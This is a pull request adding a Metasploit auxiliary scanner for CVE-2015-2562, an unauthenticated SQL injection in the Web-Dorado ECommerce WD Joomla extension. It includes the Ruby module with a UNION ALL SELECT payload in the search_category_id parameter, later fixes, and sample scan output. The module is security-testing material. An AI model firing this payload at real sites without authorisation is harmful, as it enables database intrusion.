### PR TITLE
Create joomla_ecommercewd_sqli_scanner.rb

### DIFF
--- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb
+++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb
@@ -30,6 +30,10 @@ class Metasploit4 < Msf::Auxiliary
         ],
       'DisclosureDate' => 'Mar 20 2015'))
 
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true,  "The path to the Joomla install", '/'])
+        ], self.class)
   end
 
   def run_host(ip)
@@ -76,7 +80,7 @@ class Metasploit4 < Msf::Auxiliary
         :host  => rhost,
         :port  => rport,
         :proto => 'tcp',
-        :name  => "Web-Dorado ECommerce WD search_category SQL injection",
+        :name  => "Web-Dorado ECommerce WD search_category_id SQL injection",
         :refs  => self.references.select { |ref| ref.ctx_val == "2015-2562" }
       })
     end

--- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb
+++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb
@@ -64,7 +64,7 @@ class Metasploit4 < Msf::Auxiliary
     })
 
     unless res && res.body
-      vprint_error("#{peer} - Server didn't not respond in an expected way")
+      vprint_error("#{peer} - Server didn't respond in an expected way")
       return
     end
 

--- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb
+++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb
@@ -14,7 +14,7 @@ class Metasploit4 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Web-Dorado ECommerce WD for Joomla! search_category_id SQL injection Scanner',
+      'Name'        => 'Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner',
       'Description' => %q{
       This module will scan for hosts vulnerable to an unauthenticated SQL injection within the
       advanced search feature of the Web-Dorado ECommerce WD 1.2.5 and likely prior.
@@ -64,14 +64,14 @@ class Metasploit4 < Msf::Auxiliary
     })
 
     unless res && res.body
-      vprint_error("#{peer} - Server didn't respond in an expected way")
+      vprint_error("#{peer} - Server did not respond in an expected way")
       return
     end
 
     result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
 
     if result
-      print_good("#{peer} - Vulnerable to CVE-2015-2562 (search_category parameter SQL injection)")
+      print_good("#{peer} - Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)")
       report_vuln({
         :host  => rhost,
         :port  => rport,
@@ -80,5 +80,7 @@ class Metasploit4 < Msf::Auxiliary
         :refs  => self.references.select { |ref| ref.ctx_val == "2015-2562" }
       })
     end
+
   end
+
 end

--- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb
+++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Web-Dorado ECommerce WD for Joomla! search_category_id SQL injection Scanner',
+      'Description' => %q{
+      This module will scan for hosts vulnerable to an unauthenticated SQL injection within the
+      advanced search feature of the Web-Dorado ECommerce WD 1.2.5 and likely prior.
+      },
+      'Author'       =>
+        [
+          'bperry'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2015-2562']
+        ],
+      'DisclosureDate' => 'Mar 20 2015'))
+
+  end
+
+  def run_host(ip)
+    left_marker = Rex::Text.rand_text_alpha(5)
+    right_marker = Rex::Text.rand_text_alpha(5)
+    flag = Rex::Text.rand_text_alpha(5)
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'POST',
+      'vars_get' => {
+        'option' => 'com_ecommercewd',
+        'controller' => 'products',
+        'task' => 'displayproducts',
+        'Itemid' => '-1'
+      },
+      'vars_post' => {
+        'product_id' => '-1',
+        'product_count' => '',
+        'product_parameters_json' => '',
+        'search_name' => '',
+        'search_category_id' => "1) UNION ALL SELECT CONCAT(0x#{left_marker.unpack("H*")[0]},0x#{flag.unpack("H*")[0]},0x#{right_marker.unpack("H*")[0]})-- ",
+        'filter_filters_opened' => '0',
+        'filter_manufacturer_ids' => '1',
+        'filter_price_from' => '',
+        'filter_price_to' => '',
+        'sort_by' => '',
+        'sort_order' => 'asc',
+        'pagination_limit_start' => '0',
+        'pagination_limit' => '12'
+      }
+    })
+
+    unless res && res.body
+      vprint_error("#{peer} - Server didn't not respond in an expected way")
+      return
+    end
+
+    result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
+
+    if result
+      print_good("#{peer} - Vulnerable to CVE-2015-2562 (search_category parameter SQL injection)")
+      report_vuln({
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :name  => "Web-Dorado ECommerce WD search_category SQL injection",
+        :refs  => self.references.select { |ref| ref.ctx_val == "2015-2562" }
+      })
+    end
+  end
+end


### PR DESCRIPTION
This module will scan for hosts vulnerable to CVE-2015-2562, an unauthenticated SQL injection in Web-Dorado ECommerce WD for Joomla! version 1.2.5.

```
msf auxiliary(joomla_ecommerce_wd_sqli_scanner) > show options

Module options (auxiliary/scanner/http/joomla_ecommerce_wd_sqli_scanner):

   Name     Current Setting                               Required  Description
   ----     ---------------                               --------  -----------
   Proxies                                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.56.100 192.168.56.101 192.168.56.102  yes       The target address range or CIDR identifier
   RPORT    80                                            yes       The target port
   THREADS  10                                            yes       The number of concurrent threads
   VHOST                                                  no        HTTP server virtual host

msf auxiliary(joomla_ecommerce_wd_sqli_scanner) > run

[-] 192.168.56.102:80 - Server didn't not respond in an expected way
[+] 192.168.56.101:80 - Vulnerable to CVE-2015-2562 (search_category parameter SQL injection)
[-] 192.168.56.100:80 - Server didn't not respond in an expected way
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(joomla_ecommerce_wd_sqli_scanner) > 
```

I have a copy of 1.2.5 if you can't find a copy. Can also supply a PCAP.
